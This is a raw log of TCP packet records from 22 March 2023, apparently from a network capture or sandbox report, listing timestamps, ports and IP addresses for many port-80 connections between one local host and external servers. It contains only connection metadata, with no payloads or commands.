Mar 22, 2023 05:43:11.960067987 CET	49731	80	192.168.2.5	172.67.201.26
Mar 22, 2023 05:43:11.960067987 CET	49731	80	192.168.2.5	172.67.201.26
Mar 22, 2023 05:43:11.960627079 CET	80	49731	172.67.201.26	192.168.2.5
Mar 22, 2023 05:43:11.960648060 CET	80	49731	172.67.201.26	192.168.2.5
Mar 22, 2023 05:43:11.960668087 CET	80	49731	172.67.201.26	192.168.2.5
Mar 22, 2023 05:43:11.960828066 CET	49731	80	192.168.2.5	172.67.201.26
Mar 22, 2023 05:43:11.960828066 CET	49731	80	192.168.2.5	172.67.201.26
Mar 22, 2023 05:43:11.961520910 CET	80	49731	172.67.201.26	192.168.2.5
Mar 22, 2023 05:43:11.961541891 CET	80	49731	172.67.201.26	192.168.2.5
Mar 22, 2023 05:43:11.961563110 CET	80	49731	172.67.201.26	192.168.2.5
Mar 22, 2023 05:43:11.961647034 CET	49731	80	192.168.2.5	172.67.201.26
Mar 22, 2023 05:43:11.961647987 CET	49731	80	192.168.2.5	172.67.201.26
Mar 22, 2023 05:43:11.962589979 CET	80	49731	172.67.201.26	192.168.2.5
Mar 22, 2023 05:43:11.962613106 CET	80	49731	172.67.201.26	192.168.2.5
Mar 22, 2023 05:43:11.962634087 CET	80	49731	172.67.201.26	192.168.2.5
Mar 22, 2023 05:43:11.962670088 CET	49731	80	192.168.2.5	172.67.201.26
Mar 22, 2023 05:43:11.962670088 CET	49731	80	192.168.2.5	172.67.201.26
Mar 22, 2023 05:43:11.962727070 CET	49731	80	192.168.2.5	172.67.201.26
Mar 22, 2023 05:43:12.049736023 CET	49740	80	192.168.2.5	66.94.119.160
Mar 22, 2023 05:43:12.061140060 CET	49741	80	192.168.2.5	51.79.51.72
Mar 22, 2023 05:43:12.065715075 CET	80	49731	172.67.201.26	192.168.2.5
Mar 22, 2023 05:43:12.065747023 CET	80	49731	172.67.201.26	192.168.2.5
Mar 22, 2023 05:43:12.065783978 CET	80	49731	172.67.201.26	192.168.2.5
Mar 22, 2023 05:43:12.065973043 CET	80	49731	172.67.201.26	192.168.2.5
Mar 22, 2023 05:43:12.066011906 CET	80	49731	172.67.201.26	192.168.2.5
Mar 22, 2023 05:43:12.066239119 CET	49731	80	192.168.2.5	172.67.201.26
Mar 22, 2023 05:43:12.066239119 CET	49731	80	192.168.2.5	172.67.201.26
Mar 22, 2023 05:43:12.066239119 CET	49731	80	192.168.2.5	172.67.201.26
Mar 22, 2023 05:43:12.066332102 CET	80	49731	172.67.201.26	192.168.2.5
Mar 22, 2023 05:43:12.066438913 CET	80	49731	172.67.201.26	192.168.2.5
Mar 22, 2023 05:43:12.066466093 CET	80	49731	172.67.201.26	192.168.2.5
Mar 22, 2023 05:43:12.066531897 CET	49731	80	192.168.2.5	172.67.201.26
Mar 22, 2023 05:43:12.066531897 CET	49731	80	192.168.2.5	172.67.201.26
Mar 22, 2023 05:43:12.066967010 CET	80	49731	172.67.201.26	192.168.2.5
Mar 22, 2023 05:43:12.066998005 CET	80	49731	172.67.201.26	192.168.2.5
Mar 22, 2023 05:43:12.067054987 CET	80	49731	172.67.201.26	192.168.2.5
Mar 22, 2023 05:43:12.067107916 CET	49731	80	192.168.2.5	172.67.201.26
Mar 22, 2023 05:43:12.067107916 CET	49731	80	192.168.2.5	172.67.201.26
Mar 22, 2023 05:43:12.067107916 CET	49731	80	192.168.2.5	172.67.201.26
Mar 22, 2023 05:43:12.067783117 CET	80	49731	172.67.201.26	192.168.2.5
Mar 22, 2023 05:43:12.067831993 CET	80	49731	172.67.201.26	192.168.2.5
Mar 22, 2023 05:43:12.067859888 CET	80	49731	172.67.201.26	192.168.2.5
Mar 22, 2023 05:43:12.068412066 CET	80	49731	172.67.201.26	192.168.2.5
Mar 22, 2023 05:43:12.068463087 CET	80	49731	172.67.201.26	192.168.2.5
Mar 22, 2023 05:43:12.068476915 CET	49731	80	192.168.2.5	172.67.201.26
Mar 22, 2023 05:43:12.068476915 CET	49731	80	192.168.2.5	172.67.201.26
Mar 22, 2023 05:43:12.068494081 CET	80	49731	172.67.201.26	192.168.2.5
Mar 22, 2023 05:43:12.068763018 CET	49731	80	192.168.2.5	172.67.201.26
Mar 22, 2023 05:43:12.068763018 CET	49731	80	192.168.2.5	172.67.201.26
Mar 22, 2023 05:43:12.069438934 CET	80	49731	172.67.201.26	192.168.2.5
Mar 22, 2023 05:43:12.069470882 CET	80	49731	172.67.201.26	192.168.2.5
Mar 22, 2023 05:43:12.069504023 CET	80	49731	172.67.201.26	192.168.2.5
Mar 22, 2023 05:43:12.069763899 CET	49731	80	192.168.2.5	172.67.201.26
Mar 22, 2023 05:43:12.069763899 CET	49731	80	192.168.2.5	172.67.201.26
Mar 22, 2023 05:43:12.069880009 CET	80	49731	172.67.201.26	192.168.2.5
Mar 22, 2023 05:43:12.069931984 CET	80	49731	172.67.201.26	192.168.2.5
Mar 22, 2023 05:43:12.069963932 CET	80	49731	172.67.201.26	192.168.2.5
Mar 22, 2023 05:43:12.070070982 CET	49731	80	192.168.2.5	172.67.201.26
Mar 22, 2023 05:43:12.070070982 CET	49731	80	192.168.2.5	172.67.201.26
Mar 22, 2023 05:43:12.070070982 CET	49731	80	192.168.2.5	172.67.201.26
Mar 22, 2023 05:43:12.070640087 CET	80	49731	172.67.201.26	192.168.2.5
Mar 22, 2023 05:43:12.070671082 CET	80	49731	172.67.201.26	192.168.2.5
Mar 22, 2023 05:43:12.070733070 CET	80	49731	172.67.201.26	192.168.2.5
Mar 22, 2023 05:43:12.071063995 CET	49731	80	192.168.2.5	172.67.201.26
Mar 22, 2023 05:43:12.071063995 CET	49731	80	192.168.2.5	172.67.201.26
Mar 22, 2023 05:43:12.071147919 CET	80	49735	108.167.164.216	192.168.2.5
Mar 22, 2023 05:43:12.071412086 CET	80	49731	172.67.201.26	192.168.2.5
Mar 22, 2023 05:43:12.071443081 CET	80	49731	172.67.201.26	192.168.2.5
Mar 22, 2023 05:43:12.071472883 CET	80	49731	172.67.201.26	192.168.2.5
Mar 22, 2023 05:43:12.071790934 CET	49731	80	192.168.2.5	172.67.201.26
Mar 22, 2023 05:43:12.071790934 CET	49731	80	192.168.2.5	172.67.201.26
Mar 22, 2023 05:43:12.072201967 CET	80	49731	172.67.201.26	192.168.2.5
Mar 22, 2023 05:43:12.072228909 CET	80	49731	172.67.201.26	192.168.2.5
Mar 22, 2023 05:43:12.072825909 CET	49731	80	192.168.2.5	172.67.201.26
Mar 22, 2023 05:43:12.079464912 CET	80	49735	108.167.164.216	192.168.2.5
Mar 22, 2023 05:43:12.079571962 CET	49735	80	192.168.2.5	108.167.164.216
Mar 22, 2023 05:43:12.113327026 CET	80	49739	69.163.239.62	192.168.2.5
Mar 22, 2023 05:43:12.113373995 CET	80	49739	69.163.239.62	192.168.2.5
Mar 22, 2023 05:43:12.113455057 CET	49739	80	192.168.2.5	69.163.239.62
Mar 22, 2023 05:43:12.169270039 CET	80	49741	51.79.51.72	192.168.2.5
Mar 22, 2023 05:43:12.169495106 CET	49741	80	192.168.2.5	51.79.51.72
Mar 22, 2023 05:43:12.183203936 CET	80	49740	66.94.119.160	192.168.2.5
Mar 22, 2023 05:43:12.183504105 CET	49740	80	192.168.2.5	66.94.119.160
Mar 22, 2023 05:43:12.207528114 CET	49735	80	192.168.2.5	108.167.164.216
Mar 22, 2023 05:43:12.207648993 CET	49741	80	192.168.2.5	51.79.51.72
Mar 22, 2023 05:43:12.207772970 CET	49740	80	192.168.2.5	66.94.119.160
Mar 22, 2023 05:43:12.208471060 CET	49739	80	192.168.2.5	69.163.239.62
Mar 22, 2023 05:43:12.231043100 CET	80	49729	202.254.236.40	192.168.2.5
Mar 22, 2023 05:43:12.231163979 CET	49729	80	192.168.2.5	202.254.236.40
Mar 22, 2023 05:43:12.236119986 CET	80	49734	60.43.154.138	192.168.2.5
Mar 22, 2023 05:43:12.237128019 CET	80	49734	60.43.154.138	192.168.2.5
Mar 22, 2023 05:43:12.237222910 CET	49734	80	192.168.2.5	60.43.154.138
Mar 22, 2023 05:43:12.315608978 CET	80	49741	51.79.51.72	192.168.2.5
Mar 22, 2023 05:43:12.315679073 CET	80	49741	51.79.51.72	192.168.2.5
Mar 22, 2023 05:43:12.315761089 CET	49741	80	192.168.2.5	51.79.51.72
Mar 22, 2023 05:43:12.340992928 CET	80	49740	66.94.119.160	192.168.2.5
Mar 22, 2023 05:43:12.342113972 CET	80	49735	108.167.164.216	192.168.2.5
Mar 22, 2023 05:43:12.342181921 CET	80	49740	66.94.119.160	192.168.2.5
Mar 22, 2023 05:43:12.342211008 CET	49735	80	192.168.2.5	108.167.164.216
Mar 22, 2023 05:43:12.342263937 CET	49740	80	192.168.2.5	66.94.119.160
Mar 22, 2023 05:43:12.377526999 CET	80	49739	69.163.239.62	192.168.2.5
Mar 22, 2023 05:43:12.377893925 CET	80	49739	69.163.239.62	192.168.2.5
Mar 22, 2023 05:43:12.377974033 CET	49739	80	192.168.2.5	69.163.239.62
Mar 22, 2023 05:43:12.418730974 CET	49741	80	192.168.2.5	51.79.51.72
Mar 22, 2023 05:43:12.457876921 CET	80	49738	18.119.154.66	192.168.2.5
Mar 22, 2023 05:43:12.458007097 CET	49738	80	192.168.2.5	18.119.154.66
Mar 22, 2023 05:43:12.526164055 CET	80	49741	51.79.51.72	192.168.2.5
Mar 22, 2023 05:43:12.641168118 CET	49734	80	192.168.2.5	60.43.154.138
Mar 22, 2023 05:43:12.689790964 CET	49740	80	192.168.2.5	66.94.119.160
Mar 22, 2023 05:43:12.746100903 CET	80	49725	135.181.73.98	192.168.2.5
Mar 22, 2023 05:43:12.746200085 CET	49725	80	192.168.2.5	135.181.73.98
Mar 22, 2023 05:43:12.793759108 CET	49742	80	192.168.2.5	69.163.218.51
Mar 22, 2023 05:43:12.825964928 CET	80	49740	66.94.119.160	192.168.2.5
Mar 22, 2023 05:43:12.826045990 CET	49740	80	192.168.2.5	66.94.119.160
Mar 22, 2023 05:43:12.910928965 CET	49743	80	192.168.2.5	77.68.50.105
Mar 22, 2023 05:43:12.915960073 CET	49744	80	192.168.2.5	54.161.222.85
Mar 22, 2023 05:43:12.935568094 CET	80	49734	60.43.154.138	192.168.2.5
Mar 22, 2023 05:43:12.935645103 CET	49734	80	192.168.2.5	60.43.154.138
Mar 22, 2023 05:43:12.937385082 CET	49745	80	192.168.2.5	72.44.93.236
Mar 22, 2023 05:43:12.948040009 CET	80	49743	77.68.50.105	192.168.2.5
Mar 22, 2023 05:43:12.948164940 CET	49743	80	192.168.2.5	77.68.50.105
Mar 22, 2023 05:43:12.963732958 CET	80	49742	69.163.218.51	192.168.2.5
Mar 22, 2023 05:43:12.963834047 CET	49742	80	192.168.2.5	69.163.218.51
Mar 22, 2023 05:43:12.973871946 CET	80	49738	18.119.154.66	192.168.2.5
Mar 22, 2023 05:43:12.974435091 CET	49738	80	192.168.2.5	18.119.154.66
Mar 22, 2023 05:43:12.986885071 CET	49743	80	192.168.2.5	77.68.50.105
Mar 22, 2023 05:43:12.993724108 CET	49742	80	192.168.2.5	69.163.218.51
Mar 22, 2023 05:43:12.993807077 CET	49738	80	192.168.2.5	18.119.154.66
Mar 22, 2023 05:43:13.024228096 CET	80	49743	77.68.50.105	192.168.2.5
Mar 22, 2023 05:43:13.024350882 CET	80	49743	77.68.50.105	192.168.2.5
Mar 22, 2023 05:43:13.024585009 CET	49743	80	192.168.2.5	77.68.50.105
Mar 22, 2023 05:43:13.064874887 CET	80	49744	54.161.222.85	192.168.2.5
Mar 22, 2023 05:43:13.065067053 CET	49744	80	192.168.2.5	54.161.222.85
Mar 22, 2023 05:43:13.070660114 CET	80	49745	72.44.93.236	192.168.2.5
Mar 22, 2023 05:43:13.070760965 CET	49745	80	192.168.2.5	72.44.93.236
Mar 22, 2023 05:43:13.080303907 CET	49743	80	192.168.2.5	77.68.50.105
Mar 22, 2023 05:43:13.080303907 CET	49744	80	192.168.2.5	54.161.222.85
Mar 22, 2023 05:43:13.080842972 CET	49745	80	192.168.2.5	72.44.93.236
Mar 22, 2023 05:43:13.116818905 CET	80	49743	77.68.50.105	192.168.2.5
Mar 22, 2023 05:43:13.116867065 CET	80	49743	77.68.50.105	192.168.2.5
Mar 22, 2023 05:43:13.116977930 CET	49743	80	192.168.2.5	77.68.50.105
Mar 22, 2023 05:43:13.152193069 CET	80	49738	18.119.154.66	192.168.2.5
Mar 22, 2023 05:43:13.163398027 CET	80	49742	69.163.218.51	192.168.2.5
Mar 22, 2023 05:43:13.164303064 CET	80	49742	69.163.218.51	192.168.2.5
Mar 22, 2023 05:43:13.164381981 CET	49742	80	192.168.2.5	69.163.218.51
Mar 22, 2023 05:43:13.165328979 CET	80	49742	69.163.218.51	192.168.2.5
Mar 22, 2023 05:43:13.165410995 CET	49742	80	192.168.2.5	69.163.218.51
Mar 22, 2023 05:43:13.179075003 CET	49746	80	192.168.2.5	96.127.180.42
Mar 22, 2023 05:43:13.183578014 CET	49742	80	192.168.2.5	69.163.218.51
Mar 22, 2023 05:43:13.212431908 CET	80	49698	80.93.82.33	192.168.2.5
Mar 22, 2023 05:43:13.212541103 CET	49698	80	192.168.2.5	80.93.82.33
Mar 22, 2023 05:43:13.213085890 CET	80	49745	72.44.93.236	192.168.2.5
Mar 22, 2023 05:43:13.221508980 CET	49747	80	192.168.2.5	69.163.218.51
Mar 22, 2023 05:43:13.228740931 CET	80	49744	54.161.222.85	192.168.2.5
Mar 22, 2023 05:43:13.228785992 CET	80	49744	54.161.222.85	192.168.2.5
Mar 22, 2023 05:43:13.228945017 CET	49744	80	192.168.2.5	54.161.222.85
Mar 22, 2023 05:43:13.228945971 CET	49744	80	192.168.2.5	54.161.222.85
Mar 22, 2023 05:43:13.240467072 CET	49744	80	192.168.2.5	54.161.222.85
Mar 22, 2023 05:43:13.259713888 CET	49748	80	192.168.2.5	217.19.237.54
Mar 22, 2023 05:43:13.263237000 CET	49749	80	192.168.2.5	54.161.222.85
Mar 22, 2023 05:43:13.287893057 CET	80	49745	72.44.93.236	192.168.2.5
Mar 22, 2023 05:43:13.287966013 CET	49745	80	192.168.2.5	72.44.93.236
Mar 22, 2023 05:43:13.288204908 CET	80	49748	217.19.237.54	192.168.2.5
Mar 22, 2023 05:43:13.288291931 CET	49748	80	192.168.2.5	217.19.237.54
Mar 22, 2023 05:43:13.289210081 CET	49748	80	192.168.2.5	217.19.237.54
Mar 22, 2023 05:43:13.291009903 CET	80	49745	72.44.93.236	192.168.2.5
Mar 22, 2023 05:43:13.291203976 CET	49745	80	192.168.2.5	72.44.93.236
Mar 22, 2023 05:43:13.301419973 CET	80	49746	96.127.180.42	192.168.2.5
Mar 22, 2023 05:43:13.301681995 CET	49746	80	192.168.2.5	96.127.180.42
Mar 22, 2023 05:43:13.317689896 CET	80	49748	217.19.237.54	192.168.2.5
Mar 22, 2023 05:43:13.318595886 CET	80	49748	217.19.237.54	192.168.2.5
Mar 22, 2023 05:43:13.318721056 CET	49748	80	192.168.2.5	217.19.237.54
Mar 22, 2023 05:43:13.354547977 CET	80	49742	69.163.218.51	192.168.2.5
Mar 22, 2023 05:43:13.378782034 CET	49746	80	192.168.2.5	96.127.180.42
Mar 22, 2023 05:43:13.389264107 CET	80	49744	54.161.222.85	192.168.2.5
Mar 22, 2023 05:43:13.394270897 CET	80	49747	69.163.218.51	192.168.2.5
Mar 22, 2023 05:43:13.394356012 CET	49747	80	192.168.2.5	69.163.218.51
Mar 22, 2023 05:43:13.400389910 CET	49747	80	192.168.2.5	69.163.218.51
Mar 22, 2023 05:43:13.412424088 CET	80	49749	54.161.222.85	192.168.2.5
Mar 22, 2023 05:43:13.412843943 CET	49749	80	192.168.2.5	54.161.222.85
Mar 22, 2023 05:43:13.419220924 CET	49749	80	192.168.2.5	54.161.222.85
Mar 22, 2023 05:43:13.485387087 CET	49750	80	192.168.2.5	13.248.216.40
Mar 22, 2023 05:43:13.500776052 CET	80	49746	96.127.180.42	192.168.2.5
Mar 22, 2023 05:43:13.502661943 CET	80	49746	96.127.180.42	192.168.2.5
Mar 22, 2023 05:43:13.502746105 CET	49746	80	192.168.2.5	96.127.180.42
Mar 22, 2023 05:43:13.509099007 CET	80	49750	13.248.216.40	192.168.2.5
Mar 22, 2023 05:43:13.509215117 CET	49750	80	192.168.2.5	13.248.216.40
Mar 22, 2023 05:43:13.523396969 CET	49750	80	192.168.2.5	13.248.216.40
Mar 22, 2023 05:43:13.524591923 CET	49746	80	192.168.2.5	96.127.180.42
Mar 22, 2023 05:43:13.529984951 CET	80	49699	70.39.251.249	192.168.2.5
Mar 22, 2023 05:43:13.530061007 CET	49699	80	192.168.2.5	70.39.251.249
Mar 22, 2023 05:43:13.546727896 CET	80	49750	13.248.216.40	192.168.2.5
Mar 22, 2023 05:43:13.554141998 CET	49751	80	192.168.2.5	39.99.233.155
Mar 22, 2023 05:43:13.567730904 CET	80	49749	54.161.222.85	192.168.2.5
Mar 22, 2023 05:43:13.567856073 CET	80	49749	54.161.222.85	192.168.2.5
Mar 22, 2023 05:43:13.567859888 CET	49749	80	192.168.2.5	54.161.222.85
Mar 22, 2023 05:43:13.567950010 CET	49749	80	192.168.2.5	54.161.222.85
Mar 22, 2023 05:43:13.568634033 CET	49749	80	192.168.2.5	54.161.222.85
Mar 22, 2023 05:43:13.571917057 CET	80	49747	69.163.218.51	192.168.2.5
Mar 22, 2023 05:43:13.573096037 CET	80	49747	69.163.218.51	192.168.2.5
Mar 22, 2023 05:43:13.573167086 CET	49747	80	192.168.2.5	69.163.218.51
Mar 22, 2023 05:43:13.573877096 CET	80	49747	69.163.218.51	192.168.2.5
Mar 22, 2023 05:43:13.574021101 CET	49747	80	192.168.2.5	69.163.218.51
Mar 22, 2023 05:43:13.600022078 CET	49747	80	192.168.2.5	69.163.218.51
Mar 22, 2023 05:43:13.647789955 CET	80	49746	96.127.180.42	192.168.2.5
Mar 22, 2023 05:43:13.647836924 CET	49752	80	192.168.2.5	104.196.26.65
Mar 22, 2023 05:43:13.647937059 CET	49746	80	192.168.2.5	96.127.180.42
Mar 22, 2023 05:43:13.690970898 CET	80	49750	13.248.216.40	192.168.2.5
Mar 22, 2023 05:43:13.691879034 CET	49750	80	192.168.2.5	13.248.216.40
Mar 22, 2023 05:43:13.717333078 CET	80	49749	54.161.222.85	192.168.2.5
Mar 22, 2023 05:43:13.772438049 CET	80	49747	69.163.218.51	192.168.2.5
Mar 22, 2023 05:43:13.798489094 CET	80	49752	104.196.26.65	192.168.2.5
Mar 22, 2023 05:43:13.798604965 CET	49752	80	192.168.2.5	104.196.26.65
Mar 22, 2023 05:43:13.799066067 CET	80	49751	39.99.233.155	192.168.2.5
Mar 22, 2023 05:43:13.799180031 CET	49751	80	192.168.2.5	39.99.233.155
Mar 22, 2023 05:43:13.815645933 CET	49753	80	192.168.2.5	154.203.14.100
Mar 22, 2023 05:43:13.816036940 CET	49752	80	192.168.2.5	104.196.26.65
Mar 22, 2023 05:43:13.816097021 CET	49751	80	192.168.2.5	39.99.233.155
Mar 22, 2023 05:43:13.817548990 CET	49750	80	192.168.2.5	13.248.216.40
Mar 22, 2023 05:43:13.841051102 CET	80	49750	13.248.216.40	192.168.2.5
Mar 22, 2023 05:43:13.900975943 CET	49754	80	192.168.2.5	13.225.78.34
Mar 22, 2023 05:43:13.902435064 CET	49755	80	192.168.2.5	208.97.178.138
Mar 22, 2023 05:43:13.924285889 CET	80	49754	13.225.78.34	192.168.2.5
Mar 22, 2023 05:43:13.927086115 CET	49754	80	192.168.2.5	13.225.78.34
Mar 22, 2023 05:43:13.927282095 CET	49754	80	192.168.2.5	13.225.78.34
Mar 22, 2023 05:43:13.932132959 CET	80	49750	13.248.216.40	192.168.2.5
Mar 22, 2023 05:43:13.932405949 CET	49750	80	192.168.2.5	13.248.216.40
Mar 22, 2023 05:43:13.950300932 CET	80	49754	13.225.78.34	192.168.2.5
Mar 22, 2023 05:43:13.950627089 CET	80	49754	13.225.78.34	192.168.2.5
Mar 22, 2023 05:43:13.950753927 CET	49754	80	192.168.2.5	13.225.78.34
Mar 22, 2023 05:43:13.966738939 CET	80	49752	104.196.26.65	192.168.2.5
Mar 22, 2023 05:43:13.967540026 CET	80	49752	104.196.26.65	192.168.2.5
Mar 22, 2023 05:43:13.967669964 CET	49752	80	192.168.2.5	104.196.26.65
Mar 22, 2023 05:43:14.010135889 CET	80	49755	208.97.178.138	192.168.2.5
Mar 22, 2023 05:43:14.010417938 CET	49755	80	192.168.2.5	208.97.178.138
Mar 22, 2023 05:43:14.087335110 CET	80	49753	154.203.14.100	192.168.2.5
Mar 22, 2023 05:43:14.088861942 CET	49753	80	192.168.2.5	154.203.14.100
Mar 22, 2023 05:43:14.121762991 CET	80	49751	39.99.233.155	192.168.2.5
Mar 22, 2023 05:43:14.145066977 CET	49755	80	192.168.2.5	208.97.178.138
Mar 22, 2023 05:43:14.145451069 CET	49753	80	192.168.2.5	154.203.14.100
Mar 22, 2023 05:43:14.146238089 CET	49756	80	192.168.2.5	147.154.3.56
Mar 22, 2023 05:43:14.147110939 CET	49754	80	192.168.2.5	13.225.78.34
Mar 22, 2023 05:43:14.147463083 CET	49752	80	192.168.2.5	104.196.26.65
Mar 22, 2023 05:43:14.170536995 CET	80	49754	13.225.78.34	192.168.2.5
Mar 22, 2023 05:43:14.170794010 CET	80	49754	13.225.78.34	192.168.2.5
Mar 22, 2023 05:43:14.170886993 CET	49754	80	192.168.2.5	13.225.78.34
Mar 22, 2023 05:43:14.173418999 CET	80	49751	39.99.233.155	192.168.2.5
Mar 22, 2023 05:43:14.173460007 CET	80	49751	39.99.233.155	192.168.2.5
Mar 22, 2023 05:43:14.173496008 CET	49751	80	192.168.2.5	39.99.233.155
Mar 22, 2023 05:43:14.173501015 CET	80	49751	39.99.233.155	192.168.2.5
Mar 22, 2023 05:43:14.173538923 CET	80	49751	39.99.233.155	192.168.2.5
Mar 22, 2023 05:43:14.173543930 CET	49751	80	192.168.2.5	39.99.233.155
Mar 22, 2023 05:43:14.173557043 CET	49751	80	192.168.2.5	39.99.233.155
Mar 22, 2023 05:43:14.173593044 CET	49751	80	192.168.2.5	39.99.233.155
Mar 22, 2023 05:43:14.185055971 CET	80	49707	59.106.19.204	192.168.2.5
Mar 22, 2023 05:43:14.185178041 CET	49707	80	192.168.2.5	59.106.19.204
Mar 22, 2023 05:43:14.252841949 CET	80	49755	208.97.178.138	192.168.2.5
Mar 22, 2023 05:43:14.253848076 CET	80	49755	208.97.178.138	192.168.2.5
Mar 22, 2023 05:43:14.254000902 CET	49755	80	192.168.2.5	208.97.178.138
Mar 22, 2023 05:43:14.254700899 CET	80	49755	208.97.178.138	192.168.2.5
Mar 22, 2023 05:43:14.254868984 CET	49755	80	192.168.2.5	208.97.178.138
Mar 22, 2023 05:43:14.258618116 CET	80	49756	147.154.3.56	192.168.2.5
Mar 22, 2023 05:43:14.258774042 CET	49756	80	192.168.2.5	147.154.3.56
Mar 22, 2023 05:43:14.278316021 CET	49755	80	192.168.2.5	208.97.178.138
Mar 22, 2023 05:43:14.297609091 CET	80	49752	104.196.26.65	192.168.2.5
Mar 22, 2023 05:43:14.298285961 CET	80	49752	104.196.26.65	192.168.2.5
Mar 22, 2023 05:43:14.298424959 CET	49752	80	192.168.2.5	104.196.26.65
Mar 22, 2023 05:43:14.298590899 CET	49756	80	192.168.2.5	147.154.3.56
Mar 22, 2023 05:43:14.384239912 CET	49757	80	192.168.2.5	208.97.178.138
Mar 22, 2023 05:43:14.386086941 CET	80	49755	208.97.178.138	192.168.2.5
Mar 22, 2023 05:43:14.391299009 CET	80	49715	62.122.190.121	192.168.2.5
Mar 22, 2023 05:43:14.391391039 CET	49715	80	192.168.2.5	62.122.190.121
Mar 22, 2023 05:43:14.411422014 CET	80	49756	147.154.3.56	192.168.2.5
Mar 22, 2023 05:43:14.414068937 CET	49758	80	192.168.2.5	188.166.152.188
Mar 22, 2023 05:43:14.416177988 CET	80	49751	39.99.233.155	192.168.2.5
Mar 22, 2023 05:43:14.416199923 CET	80	49751	39.99.233.155	192.168.2.5
Mar 22, 2023 05:43:14.416239023 CET	80	49751	39.99.233.155	192.168.2.5
Mar 22, 2023 05:43:14.416263103 CET	80	49751	39.99.233.155	192.168.2.5
Mar 22, 2023 05:43:14.416284084 CET	80	49751	39.99.233.155	192.168.2.5
Mar 22, 2023 05:43:14.416307926 CET	80	49751	39.99.233.155	192.168.2.5
Mar 22, 2023 05:43:14.416328907 CET	80	49751	39.99.233.155	192.168.2.5
Mar 22, 2023 05:43:14.416363955 CET	49751	80	192.168.2.5	39.99.233.155
Mar 22, 2023 05:43:14.416382074 CET	80	49751	39.99.233.155	192.168.2.5
Mar 22, 2023 05:43:14.416414022 CET	49751	80	192.168.2.5	39.99.233.155
Mar 22, 2023 05:43:14.416431904 CET	49751	80	192.168.2.5	39.99.233.155
Mar 22, 2023 05:43:14.426861048 CET	80	49756	147.154.3.56	192.168.2.5
Mar 22, 2023 05:43:14.426934958 CET	49756	80	192.168.2.5	147.154.3.56
Mar 22, 2023 05:43:14.427074909 CET	80	49756	147.154.3.56	192.168.2.5
Mar 22, 2023 05:43:14.427246094 CET	49756	80	192.168.2.5	147.154.3.56
Mar 22, 2023 05:43:14.450417042 CET	80	49758	188.166.152.188	192.168.2.5
Mar 22, 2023 05:43:14.450544119 CET	49758	80	192.168.2.5	188.166.152.188
Mar 22, 2023 05:43:14.492665052 CET	80	49757	208.97.178.138	192.168.2.5
Mar 22, 2023 05:43:14.492897987 CET	49757	80	192.168.2.5	208.97.178.138
Mar 22, 2023 05:43:14.543808937 CET	49758	80	192.168.2.5	188.166.152.188
Mar 22, 2023 05:43:14.544694901 CET	49759	80	192.168.2.5	3.65.101.129
Mar 22, 2023 05:43:14.544720888 CET	49757	80	192.168.2.5	208.97.178.138
Mar 22, 2023 05:43:14.568497896 CET	80	49759	3.65.101.129	192.168.2.5
Mar 22, 2023 05:43:14.568598032 CET	49759	80	192.168.2.5	3.65.101.129
Mar 22, 2023 05:43:14.568950891 CET	49759	80	192.168.2.5	3.65.101.129
Mar 22, 2023 05:43:14.571867943 CET	49760	80	192.168.2.5	198.100.146.220
Mar 22, 2023 05:43:14.579560995 CET	80	49758	188.166.152.188	192.168.2.5
Mar 22, 2023 05:43:14.580810070 CET	80	49758	188.166.152.188	192.168.2.5
Mar 22, 2023 05:43:14.581171036 CET	49758	80	192.168.2.5	188.166.152.188
Mar 22, 2023 05:43:14.592550993 CET	80	49759	3.65.101.129	192.168.2.5
Mar 22, 2023 05:43:14.593189001 CET	80	49759	3.65.101.129	192.168.2.5
Mar 22, 2023 05:43:14.593272924 CET	49759	80	192.168.2.5	3.65.101.129
Mar 22, 2023 05:43:14.653235912 CET	80	49757	208.97.178.138	192.168.2.5
Mar 22, 2023 05:43:14.654236078 CET	80	49757	208.97.178.138	192.168.2.5
Mar 22, 2023 05:43:14.654844046 CET	49757	80	192.168.2.5	208.97.178.138
Mar 22, 2023 05:43:14.655028105 CET	80	49757	208.97.178.138	192.168.2.5
Mar 22, 2023 05:43:14.655122042 CET	49757	80	192.168.2.5	208.97.178.138
Mar 22, 2023 05:43:14.660842896 CET	80	49751	39.99.233.155	192.168.2.5
Mar 22, 2023 05:43:14.660895109 CET	80	49751	39.99.233.155	192.168.2.5
Mar 22, 2023 05:43:14.661046028 CET	49751	80	192.168.2.5	39.99.233.155
Mar 22, 2023 05:43:14.661084890 CET	49751	80	192.168.2.5	39.99.233.155
Mar 22, 2023 05:43:14.666894913 CET	49757	80	192.168.2.5	208.97.178.138
Mar 22, 2023 05:43:14.772936106 CET	49761	80	192.168.2.5	74.208.215.199
Mar 22, 2023 05:43:14.773051023 CET	49759	80	192.168.2.5	3.65.101.129
Mar 22, 2023 05:43:14.775335073 CET	80	49757	208.97.178.138	192.168.2.5
Mar 22, 2023 05:43:14.797204018 CET	80	49759	3.65.101.129	192.168.2.5
Mar 22, 2023 05:43:14.797493935 CET	49759	80	192.168.2.5	3.65.101.129
Mar 22, 2023 05:43:14.817878008 CET	49759	80	192.168.2.5	3.65.101.129
Mar 22, 2023 05:43:14.834897041 CET	49753	80	192.168.2.5	154.203.14.100
Mar 22, 2023 05:43:14.842139959 CET	80	49759	3.65.101.129	192.168.2.5
Mar 22, 2023 05:43:14.842385054 CET	49759	80	192.168.2.5	3.65.101.129
Mar 22, 2023 05:43:14.843574047 CET	49759	80	192.168.2.5	3.65.101.129
Mar 22, 2023 05:43:14.867033005 CET	49762	80	192.168.2.5	188.114.97.3
Mar 22, 2023 05:43:14.867553949 CET	80	49759	3.65.101.129	192.168.2.5
Mar 22, 2023 05:43:14.867647886 CET	49759	80	192.168.2.5	3.65.101.129
Mar 22, 2023 05:43:14.868576050 CET	49763	80	192.168.2.5	23.227.38.74
Mar 22, 2023 05:43:14.869185925 CET	49759	80	192.168.2.5	3.65.101.129
Mar 22, 2023 05:43:14.888024092 CET	80	49762	188.114.97.3	192.168.2.5
Mar 22, 2023 05:43:14.890682936 CET	80	49763	23.227.38.74	192.168.2.5
Mar 22, 2023 05:43:14.890886068 CET	49762	80	192.168.2.5	188.114.97.3
Mar 22, 2023 05:43:14.890960932 CET	49763	80	192.168.2.5	23.227.38.74
Mar 22, 2023 05:43:14.891408920 CET	49763	80	192.168.2.5	23.227.38.74
Mar 22, 2023 05:43:14.891431093 CET	49762	80	192.168.2.5	188.114.97.3
Mar 22, 2023 05:43:14.893676043 CET	80	49759	3.65.101.129	192.168.2.5
Mar 22, 2023 05:43:14.894849062 CET	49759	80	192.168.2.5	3.65.101.129
Mar 22, 2023 05:43:14.901724100 CET	80	49751	39.99.233.155	192.168.2.5
